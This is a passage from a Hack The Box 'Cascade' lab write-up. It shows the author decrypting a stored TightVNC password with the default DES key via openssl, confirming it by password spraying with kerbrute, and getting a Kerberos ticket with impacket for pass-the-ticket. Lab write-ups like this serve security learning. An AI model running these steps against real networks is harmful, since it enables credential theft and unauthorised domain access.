VNC


Virtual Network Computing (VNC) is a graphical desktop-sharing system that uses the Remote Frame Buffer (RFB) protocol to remotely control another computer. It transmits keyboard and mouse input from one computer to another and relays graphical screen updates back over the network. VNC is platform-independent: there are clients and servers for many GUI-based operating systems and for Java. Multiple clients may connect to a VNC server at the same time. Popular uses for this technology include remote technical support and accessing files on one's work computer from one's home computer, or vice versa.

By default, password-based authentication is the standard authentication mechanism used by VNC. The VNC server requires clients to provide the correct password during the connection process. The password is often stored on the server in an encrypted or hashed form to enhance security. The client sends the password (encrypted or hashed) to the server for authentication. If the provided password matches the stored password, the client is granted access to the remote desktop.

In the current context, I found a pre-configured registry set for a TightVNC installation at \\casc-dc1.cascade.local\Data\IT\Temp\s.smith\VNC Install.reg. The registry set had an encrypted VNC credential hard-coded in hexadecimal format.

Decryption


If the password was encrypted using the default encryption key, it can easily be decrypted using the method above:

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ echo "6bcf2a4b6e5aca0f" | xxd -r -p > secret

I had already converted the hex string into a plaintext string and stored it in the secret file

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ cat secret | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000  73 54 33 33 33 76 65 32                           |sT333ve2|
00000008

The decrypted VNC password is sT333ve2

Although I suspect that the password belongs to the s.smith user, as the registry file was located within that user's directory, I will perform a password spray attack to validate it

Password Spray


┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ kerbrute passwordspray -d CASCADE.LOCAL --dc casc-dc1.cascade.local users 'sT333ve2'   
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 06/26/23 - Ronnie Flathers @ropnop
 
2023/06/26 08:55:28 >  Using KDC(s):
2023/06/26 08:55:28 >  	casc-dc1.cascade.local:88
 
2023/06/26 08:55:38 >  [+] VALID LOGIN:	 s.smith@CASCADE.LOCAL:sT333ve2
2023/06/26 08:55:48 >  Done! Tested 17 logins (1 successes) in 20.789 seconds

The password is confirmed to belong to the s.smith user

TGT


┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ impacket-getTGT 'CASCADE.LOCAL/s.smith:sT333ve2' -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in s.smith.ccache

TGT generated for the s.smith user. The TGT will allow me to continue the operation with the pass-the-ticket technique